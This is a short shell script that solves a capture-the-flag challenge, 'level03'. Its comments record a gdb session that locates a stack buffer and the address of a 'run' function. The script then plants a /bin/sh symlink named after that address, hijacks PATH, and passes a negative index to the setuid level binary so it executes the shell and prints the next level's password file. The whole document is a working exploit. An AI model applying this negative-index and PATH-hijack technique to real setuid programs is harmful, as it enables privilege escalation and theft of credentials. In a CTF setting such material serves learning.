#!/bin/sh

# level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
# (gdb) break truncate_and_call
# Breakpoint 1 at 0x8048780: file level03.c, line 57.
# (gdb) run 1 something
# Starting program: /levels/level03 1 something
# Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
# 57      in level03.c
# (gdb) n
# 60      in level03.c
# (gdb) p &buf
# $1 = (char (*)[64]) 0xffeecf7c
# (gdb) p fns
# $2 = (fn_ptr *) 0xffeecfec
# (gdb) p (0xffeecfec-0xffeecf7c)/4
# $3 = 28
# (gdb) p run
# $4 = {int (const char *)} 0x804875b <run>
# (gdb) quit

ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')"
echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')"
rm "$(printf '\x5b\x87\x04\x08')"